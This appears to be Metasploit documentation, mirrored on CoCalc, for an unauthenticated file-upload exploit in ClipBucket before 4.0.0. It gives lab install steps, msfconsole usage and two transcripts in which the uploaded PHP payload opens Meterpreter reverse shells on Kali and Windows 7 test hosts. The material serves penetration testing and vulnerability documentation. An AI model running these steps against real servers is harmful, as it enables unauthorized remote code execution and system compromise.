CoCalc -- clipbucket_fileupload

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md
Views: ¹⁹⁰⁴

Vulnerable Application

Description

A malicious file can be uploaded by an unauthenticated attacker through the actions/beats_uploader.php script. ClipBucket < 4.0.0 - Release 4902 is vulnerable. Additional information and vulnerabilities can be viewed on Exploit-DB 44250

Available at Exploit-DB

Installation

Download Application: wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip

Unzip: unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip

Move In WebDirectory: mv clipbucket-4881/upload/* /var/www/html/

Change Owner: chown -R www-data:www-data /var/www/html/

Follow Clipbucket Installer Instructions at: http://localhost/

Verification Steps

Install the application
Start msfconsole
Do: use exploit/multi/http/clipbucket_fileupload_exec
Do: set rport <port>
Do: set rhost <ip>
Do: set lport <port>
Do: set lhost <ip>
Do: exploit
You should get a shell.

Options

TARGETURI

TARGETURI by default is /, however it can be changed.

Scenarios

ClipBucket on Kali Linux

msf > use exploit/multi/http/clipbucket_fileupload_exec 
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4
rhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket
targeturi => clipbucket
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050
lport => 5050
msf exploit(multi/http/clipbucket_fileupload_exec) > run 

[*] Started reverse TCP handler on 10.22.1.4:5050 
[*] Uploading payload..
[+] Looking For Payload .... 
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php 
[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ]
[*] Sending stage (37543 bytes) to 10.22.1.4
[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530
[+] Deleted 1520842928949a3f.php

meterpreter > sysinfo 
Computer    : linux
OS          : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64
Meterpreter : php/linux
meterpreter >

ClipBucket on Windows 7

msf > use exploit/multi/http/clipbucket_fileupload_exec 
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13
rhost => 10.22.1.13
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest
TARGETURI => clipbucketest
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4 
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545
lport => 4545
msf exploit(multi/http/clipbucket_fileupload_exec) > exploit 

[*] Started reverse TCP handler on 10.22.1.4:4545 
[*] Uploading payload..
[+] Looking For Payload .... 
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php 
[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ]
[*] Sending stage (37543 bytes) to 10.22.1.13
[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530
[+] Deleted 152084407045df09.php

meterpreter > sysinfo 
Computer    : AGENT22-PC
OS          : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter >